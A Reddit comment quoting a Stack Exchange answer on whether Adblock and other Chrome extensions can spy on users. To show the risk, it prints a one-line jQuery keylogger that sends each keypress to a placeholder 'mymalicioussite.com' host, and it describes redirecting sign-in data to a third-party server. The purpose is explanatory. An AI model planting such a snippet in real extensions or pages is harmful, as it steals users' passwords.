Take this YouTube!

Dance Monkey Dance!

https://www.youtube.com/watch?v=ytZFm1NW5MM

I have no evidence to prove that Adblock or Adblock Plus does (and if evidence did surface, you bet your ass that those products would be tarnished). Max Adblock probably does. Here's the thing: all of Adblock plugings CAN do that, if they are written to do so:

http://security.stackexchange.com/questions/52361/is-adblock-plus-a-security-risk

Open source plugins should be more trustable than closed source.

Specifically:

Update

After thinking it over, I have to agree with the other answers in that, despite the fact that it CAN access your data, Adblock is more likely to protect your privacy than invade it. The real risk are malicious ads that prompt you to install software on your computer. Adblock prevents these.

Below is the original, cautionary answer: Yes, it totally is.

Adblock Plus is a browser extension/add-on developed by an independent developer. Adblock can access the DOM (document object model) on all pages.

The way AdBlock works is that it injects script into your browser, which searches the DOM, and then runs a hide() function on what it determines are ads.

That means AdBlock (and any Chrome extension with that permission) can access your DOM. Adblock cannot access JavaScript variables.

What does this mean?

If you are on a website with secure authentication, and there is a JavaScript object with something private like an AuthKey, you are safe. AdBlock cannot access JavaScript variables.

However, AdBlock CAN run code equivalent to this.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Which essentially will route any keys you press to a remote server.

This can be used to steal your password which is even worse than stealing your token. That Being Said, Is AdBlock itself Dangerous?

It seems to me that AdBlock is not overly dangerous as the developer has identified himself and it is used by millions of people. If it was doing the kind of trickiness as above, someone would have likely noticed and blown the whistle.

But don't think Chrome Extensions are totally safe. All of them can steal any data, as well as other malicious things. What Else Can It Do?

A Chrome Extension can also perform the following security violations quite trivially...

Route the content of any email or page you read to a third-party source (if this email contains unencrypted login information, you are busted) If you can see it on the screen, so can any Chrome Extension, no questions asked. Enter information into a field and press the submit button, for example, send an e-mail If you leave your browser open, and the extension knows how, it can use your email interface (Gmail, Outlook) to send e-mail of its choosing to your contacts. This is trivial. Change the script associated with any button, if that was originally put in with jQuery. For example, the button that sends your sign-in information to the server can be changed slightly to send that information to both the server and http://mymaliciousserver. This is trivial.

Update

It has been verified through discussion that AdBlock is open source. This should let you trust AdBlock more, but remember it is still capable of doing those things. I've reviewed the source and I can safely say I haven't any idea at all what's going on. Source: I am a JavaScript and Chrome Extension developer.

/r/AdviceAnimals Thread Parent Link - imgur.com